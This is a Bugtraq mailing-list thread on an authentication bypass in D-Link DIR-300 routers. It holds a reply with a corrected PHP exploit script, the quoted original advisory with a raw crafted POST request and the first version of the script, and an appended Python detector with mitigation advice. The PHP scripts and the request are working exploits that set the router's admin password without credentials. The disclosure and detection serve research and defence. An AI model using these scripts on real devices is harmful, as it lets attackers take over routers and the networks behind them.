Re: D-Link DIR-300 authentication bypass

Board: Bugtraq, posted 2010/11/10 04:01
On some versions of the firmware, the exploit says "something goes wrong" even though the password change is successful. There is a fixed version:

---cut here---
<?php
        if(sizeof($argv)!=4) {
                echo "Usage: php5 $argv[0] <router ip address> <port> <admin password>\n";
                exit;
        }
        $ch=curl_init();
        curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_PORT, $argv[2]);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, "ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=".urlencode($argv[3]));
        echo "+ starting request\n";
        $out = curl_exec($ch);
        if($out===false) {
                echo "- Error: could not connect ( http://$argv[1]:$argv[2]/tools_admin.php).\n";
                exit;
        } else
                echo "+ request sent\n";
        curl_close($ch);
        // stripos() returns an offset or false, never true, so the original
        // "=== true" test could never match; compare against false instead
        if(stripos($out,"login.php")!==false) {
                echo "- something goes wrong (check answer - answer.html) !\n";
                $f=fopen("answer.html","w"); fwrite($f,$out); fclose($f);
                exit;
        } else
                echo "+ ok, now you can login using l: admin p:$argv[3]\n";
?>
---cut here---

On 9 November 2010 at 10:05, Karol Celiński <karol@celin.pl> wrote:
> [intro]
> Hello, I found a security bug in the D-Link DIR-300 wireless router. It can
> be used to bypass the authentication mechanism by an attacker with access to
> the web interface. I reported it to D-Link but they are not replying to
> my emails. Judging by other D-Link security holes and their status, I
> think that they won't reply, so I decided to write about it here.
>
> [Technical details]
>
> The control panel script tools_admin.php allows an attacker to change the
> administrator name, password and other variables without any
> authorization by sending a specially crafted HTTP POST request such as:
>
> ---cut here---
> POST http://192.168.1.1:80/tools_admin.php HTTP/1.1
> Host: 192.168.1.2
> Keep-Alive: 115
> Content-Type: application/x-www-form-urlencoded
> Content-length: 0
>
> ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=uhOHahEh
> ---cut here---
>
> If an attacker makes this request to the control panel, the
> administrator username is set to admin with the password "uhOHahEh".
>
> [Affected]
>
> - All known D-Link DIR-300 firmware (i.e. 2.01B1, 1.04, 1.05).
> - It is possible that other D-Link devices which use the same PHP
> scripts in the control panel are affected. I'm not able to check it
> because I don't have devices for tests. I'm counting on you ;->
>
> [Code]
>
> ---cut here---
> <?php
>         if(sizeof($argv)!=4) {
>                 echo "Usage: php5 $argv[0] <router ip address> <port> <admin password>\n";
>                 exit;
>         }
>         $ch=curl_init();
>         curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php");
>         curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
>         curl_setopt($ch, CURLOPT_PORT, $argv[2]);
>         curl_setopt($ch, CURLOPT_POST, 1);
>         curl_setopt($ch, CURLOPT_POSTFIELDS, "ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=".urlencode($argv[3]));
>         echo "+ starting request\n";
>         $out = curl_exec($ch);
>         if($out===false) {
>                 echo "- Error: could not connect ( http://$argv[1]:$argv[2]/tools_admin.php).\n";
>                 exit;
>         } else
>                 echo "+ request sent\n";
>         curl_close($ch);
>         if(stripos($out,"Successfully")===false) {
>                 echo "- something goes wrong (check answer - answer.html) !\n";
>                 $f=fopen("answer.html","w"); fwrite($f,$out); fclose($f);
>                 exit;
>         }
>         else
>                 echo "+ ok, now you can login using l: admin p:$argv[3]\n";
> ?>
> ---cut here---
>
> [History]
>
>  - Information sent to vendor 07.08.2010
>  - No response
>  - Information resent to vendor 07.31.2010
>  - No response from vendor
>
>
> [Credits]
> Karol Celiński ( Celin )
> Pentester/Researcher @ Safe Computing
>
> [Contact]
>
> karol at celin dot pl
>
> [Greetz]
> Tomasz Sawiak, Jacek Kowalski, Marcin Kozlowski, Robert Tomczykowski,
> Wojtek Machaj, Marek Zmyslowski, Szymon Sobczyk and all Safe Computing
> members.
>
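As an added example (not part of this reply or of the quoted advisory), the Python below shows how a defender could spot the bypass pattern the advisory describes in captured HTTP requests: a POST to tools_admin.php that carries NO_NEED_AUTH=1, or that couples the LOGIN action with admin_* settings in a single request. It assumes raw requests are available from a proxy or IDS capture, which the thread does not discuss; the sample requests are constructed here, with the first modelled on the request in the advisory.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed sample captures (not real traffic). The first mirrors the
# advisory's request shape; the other two are benign for comparison.
SAMPLE_REQUESTS = [
    "POST http://192.168.1.1:80/tools_admin.php HTTP/1.1\r\n"
    "Host: 192.168.1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+"
    "&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=EXAMPLE",
    # Ordinary login form submission to the login page.
    "POST /login.php HTTP/1.1\r\n"
    "Host: 192.168.1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "ACTION_POST=LOGIN&LOGIN_USER=admin&LOGIN_PASSWD=secret&login=+Log+In+",
    # Plain page fetch of the admin tools page, no form body.
    "GET /tools_admin.php HTTP/1.1\r\nHost: 192.168.1.1\r\n\r\n",
]


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, form params)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line = head.split("\r\n")[0]
    method, target, _version = request_line.split(" ", 2)
    # The target may be absolute-form (as in the advisory) or origin-form;
    # urlsplit yields the path component in both cases.
    path = urlsplit(target).path
    # Keep the last value for repeated keys; blank values are kept so that
    # "NO_NEED_AUTH=" is still visible to the rules.
    params = {k: v[-1] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return method, path, params


def flag_request(raw):
    """Return a list of findings for one request (empty when it looks benign)."""
    method, path, params = parse_request(raw)
    findings = []
    if method != "POST" or not path.endswith("/tools_admin.php"):
        return findings
    # A client should never be able to tell the server that no auth is needed.
    if params.get("NO_NEED_AUTH") == "1":
        findings.append("NO_NEED_AUTH=1 sent to tools_admin.php")
    # The advisory's request logs in and changes admin settings in one shot.
    admin_fields = sorted(k for k in params if k.startswith("admin_"))
    if params.get("ACTION_POST") == "LOGIN" and admin_fields:
        findings.append(
            "login action combined with admin settings: " + ", ".join(admin_fields)
        )
    return findings


def scan(requests):
    """Return (index, findings) for every request that trips at least one rule."""
    results = []
    for i, raw in enumerate(requests):
        findings = flag_request(raw)
        if findings:
            results.append((i, findings))
    return results


if __name__ == "__main__":
    for index, findings in scan(SAMPLE_REQUESTS):
        print(f"request {index}:")
        for finding in findings:
            print(f"  - {finding}")
```

Detection of this kind only reduces the window of exposure; the underlying defect is that the device's control panel lets a client-supplied parameter (NO_NEED_AUTH) decide whether authentication is required, and that decision has to be made server-side. Until a firmware fix is available, keeping the web interface unreachable from the WAN and restricting which LAN hosts can reach it limits who can send this request at all.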
Article ID (AID): #1CsQX-zC (Bugtraq)